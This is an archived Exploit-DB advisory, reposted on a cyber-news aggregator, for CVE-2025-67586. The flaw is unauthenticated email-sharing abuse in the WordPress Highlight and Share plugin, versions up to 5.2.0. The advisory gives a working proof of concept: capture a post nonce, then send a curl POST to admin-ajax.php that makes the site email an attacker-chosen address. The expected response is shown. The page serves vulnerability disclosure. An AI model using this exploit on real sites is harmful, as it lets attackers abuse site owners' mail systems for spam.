CyberIntel ⬡ News
★ Saved ◆ Cyber Reads
← Back ⬡ Vulnerabilities & CVEs Apr 22, 2026

[webapps] WordPress Plugin 5.2.0 - Broken Access Control

Exploit DB Archived Apr 22, 2026 ✓ Full text saved

WordPress Plugin 5.2.0 - Broken Access Control

Full text archived locally
✦ AI Summary · Claude Sonnet


    EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING WordPress Plugin 5.2.0 - Broken Access Control EDB-ID: 52511 CVE: 2025-67586 EDB Verified: Author: CYDEV.TURING Type: WEBAPPS Exploit:   /   Platform: MULTIPLE Date: 2026-04-22 Vulnerable App: # Exploit Title: WordPress Plugin 5.2.0 - Broken Access Control # Date: 2025-09-20 # Exploit Author: Zeeshan Haider # Vendor Homepage: https://wordpress.org/plugins/ # Software Link: https://wordpress.org/plugins/highlight-and-share/ # Version: <= 5.2.0 (REQUIRED) # Tested on: WordPress 6.x, Kali Linux # CVE: CVE-2025-67586 ==> Description A broken access control vulnerability exists in a WordPress plugin developed by DLX Plugins. The plugin exposes an unauthenticated AJAX action that allows attackers to abuse the "Share via Email" functionality without proper permission checks. An unauthenticated attacker can reuse a valid post nonce to trigger email sharing requests, leading to unauthorized email sending (email spam / abuse) without user authentication. ==> Privileges Required None (Unauthenticated) ==> Proof of Concept (PoC) > Step 1: Pick website with Installed Plugin > Step 2: Obtain a Valid Nonce 1. Open a public post. 2. Highlight text and click **Share via Email**. 3. Open Developer Tools → Network → XHR. 4. Send the email once. 5. Capture the request containing: action=has_email_social_modal nonce=<NONCE> post_id=<POSTID> Step 3: Exploit via Unauthenticated Request > bash cmd: (replace website URL, post URL, and nonce) curl -s -i -X POST 'http://localhost/wp-admin/admin-ajax.php' \ -d 'action=has_email_form_submission' \ -d 'formData[postId]=<POSTID>' \ -d 'formData[permalink]=http://localhost/?p=<POSTID>' \ -d 'formData[nonce]=<NONCE>' \ -d 'formData[toEmail]=attacker@example.com' \ -d 'formData[subject]=PoC' \ -d 'formData[shareText]=POC test' \ -d 'formData[emailShareType]=selection' \ --compressed --> Expected JSON response: { "success": true, "data": { "errors": false, "message_title": "This post has been shared!", "message_body": "You have shared this post with attacker@example.com", "message_subject": "[Shared Post] <POST TITLE>", "message_source_name": "Site Name", "message_source_email": "site@example.com" } } Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services
    💬 Team Notes
    Article Info
    Source
    Exploit DB
    Category
    ⬡ Vulnerabilities & CVEs
    Published
    Apr 22, 2026
    Archived
    Apr 22, 2026
    Full Text
    ✓ Saved locally
    Open Original ↗